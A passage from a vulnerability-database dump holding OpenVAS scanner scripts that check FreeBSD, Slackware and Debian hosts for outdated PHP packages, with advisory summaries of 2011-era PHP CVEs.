script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-21 05:47:11 +0200 (Wed, 21 Sep 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2483\", \"CVE-2011-2202\", \"CVE-2011-1938\", \"CVE-2011-1148\");\n script_bugtraq_id(49241);\n script_name(\"FreeBSD Ports: php5, php5-sockets\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.3.7\")<0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"php5-sockets\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.3.7\")<0) {\n txt += 'Package php5-sockets version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2011-09-21T00:00:00", "id": "OPENVAS:136141256231070257", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070257", "type": "openvas", "title": "FreeBSD Ports: php5, php5-sockets", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_php513.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 057bf770-cac4-11e0-aea3-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70257\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-21 05:47:11 +0200 (Wed, 21 Sep 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2483\", \"CVE-2011-2202\", \"CVE-2011-1938\", \"CVE-2011-1148\");\n script_bugtraq_id(49241);\n script_name(\"FreeBSD Ports: php5, php5-sockets\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n php5\n php5-sockets\n\nCVE-2011-2483\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, does not properly handle 8-bit characters, which makes it\neasier for context-dependent attackers to determine a cleartext\npassword by leveraging knowledge of a password hash.\n\nCVE-2011-2202\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\nCVE-2011-1938\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket.\n\nCVE-2011-1148\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"php5\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.3.7\")<0) {\n txt += 'Package php5 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"php5-sockets\");\nif(!isnull(bver) && revcomp(a:bver, b:\"5.3.7\")<0) {\n txt += 'Package php5-sockets version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-237-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-10T00:00:00", "id": "OPENVAS:136141256231071962", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071962", "type": "openvas", "title": "Slackware Advisory SSA:2011-237-01 php", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_237_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-237-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71962\");\n script_cve_id(\"CVE-2011-2483\", \"CVE-2011-2202\", \"CVE-2011-1938\", \"CVE-2011-1148\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:18 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-237-01 php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(11\\.0|12\\.0|12\\.1|12\\.2|13\\.0|13\\.1|13\\.37)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-237-01\");\n\n script_tag(name:\"insight\", value:\"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\n13.1, 13.37, and -current to fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2011-237-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:51:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-2202"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-237-01.", "modified": "2017-07-06T00:00:00", "published": "2012-09-10T00:00:00", "id": "OPENVAS:71962", "href": "http://plugins.openvas.org/nasl.php?oid=71962", "type": "openvas", "title": "Slackware Advisory SSA:2011-237-01 php ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_237_01.nasl 6581 2017-07-06 13:58:51Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-237-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, 13.0,\n13.1, 13.37, and -current to fix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2011-237-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-237-01\";\n \nif(description)\n{\n script_id(71962);\n script_cve_id(\"CVE-2011-2483\", \"CVE-2011-2202\", \"CVE-2011-1938\", \"CVE-2011-1148\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6581 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:58:51 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:18 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-237-01 php \");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.3.8-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1938", "CVE-2011-4885", "CVE-2011-2483", "CVE-2012-0057", "CVE-2011-4566"], "description": "The remote host is missing an update to php5\nannounced via advisory DSA 2399-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70716", "href": "http://plugins.openvas.org/nasl.php?oid=70716", "type": "openvas", "title": "Debian Security Advisory DSA 2399-1 (php5)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2399_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2399-1 (php5)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in PHP, the web scripting\nlanguage. The Common Vulnerabilities and Exposures project identifies\nthe following issues:\n\nCVE-2011-1938\n\nThe UNIX socket handling allowed attackers to trigger a buffer overflow\nvia a long path name.\n\nCVE-2011-2483\n\nThe crypt_blowfish function did not properly handle 8-bit characters,\nwhich made it easier for attackers to determine a cleartext password\nby using knowledge of a password hash.\n\nCVE-2011-4566\n\nWhen used on 32 bit platforms, the exif extension could be used to\ntrigger an integer overflow in the exif_process_IFD_TAG function\nwhen processing a JPEG file.\n\nCVE-2011-4885\n\nIt was possible to trigger hash collisions predictably when parsing\nform parameters, which allows remote attackers to cause a denial of\nservice by sending many crafted parameters.\n\nCVE-2012-0057\n\nWhen applying a crafted XSLT transform, an attacker could write files\nto arbitrary places in the filesystem.\n\nNOTE: the fix for CVE-2011-2483 required changing the behaviour of this\nfunction: it is now incompatible with some old (wrongly) generated hashes\nfor passwords containing 8-bit characters. See the package NEWS entry\nfor details. This change has not been applied to the Lenny version of PHP.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 5.2.6.dfsg.1-1+lenny14.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 5.3.3-7+squeeze5.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems have been fixed in version 5.3.9-1.\n\nWe recommend that you upgrade your php5 packages.\";\ntag_summary = \"The remote host is missing an update to php5\nannounced via advisory DSA 2399-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202399-1\";\n\nif(description)\n{\n script_id(70716);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1938\", \"CVE-2011-2483\", \"CVE-2011-4566\", \"CVE-2011-4885\", \"CVE-2012-0057\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 06:36:57 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2399-1 (php5)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-1+lenny14\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.3-7+squeeze5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.10-1\", rls:\"DEB7.0\")) != NULL) {\n report += 